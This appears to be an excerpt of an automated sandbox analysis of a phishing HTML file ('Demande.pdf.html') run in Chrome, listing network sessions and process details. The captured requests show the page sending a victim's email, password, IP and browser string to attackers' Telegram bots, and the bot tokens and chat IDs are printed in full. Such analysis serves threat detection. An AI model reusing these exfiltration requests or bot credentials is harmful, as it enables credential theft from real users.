                                                        2025-03-25 14:45:56 UTC689INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 39 36 33 35 36 33 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 32 32 33 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 78 32 32 33 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 35 30 38 32 39 30 38 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 20 4c 61 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 72 6c 65 6c 61 69 74 32 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 39 31 33
                                                        Data Ascii: {"ok":true,"result":{"message_id":62,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.749731149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:57 UTC855OUTGET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:57 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:57 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 689
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:57 UTC689INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 39 36 33 35 36 33 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 32 32 33 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 78 32 32 33 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 35 30 38 32 39 30 38 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 20 4c 61 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 72 6c 65 6c 61 69 74 32 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 39 31 33
                                                        Data Ascii: {"ok":true,"result":{"message_id":63,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.749732149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:57 UTC835OUTGET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:57 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:57 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 681
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:57 UTC681INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 30 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 37 31 38 33 35 39 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 65 37 20 45 4d 41 49 4c 20 52 45 5c 75 30 30 63 37 55 20 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6e 53 70 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 33 39 34 37 31 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 5f 30 30 32 32 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a
                                                        Data Ascii: {"ok":true,"result":{"message_id":30055,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":


                                                        Target ID:0
                                                        Start time:10:44:53
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:10:44:54
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,13775181558258972133,7707862200388720938,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2052 /prefetch:3
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:10:45:00
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download"
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        Target ID:14
                                                        Start time:10:46:12
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:10:46:13
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,5492377399383372015,5736696650145725738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250324-180219.885000 --mojo-platform-channel-handle=2084 /prefetch:3
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:18
                                                        Start time:10:46:48
                                                        Start date:25/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\Demande.pdf.html"
                                                        Imagebase:0x7ff778810000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        No disassembly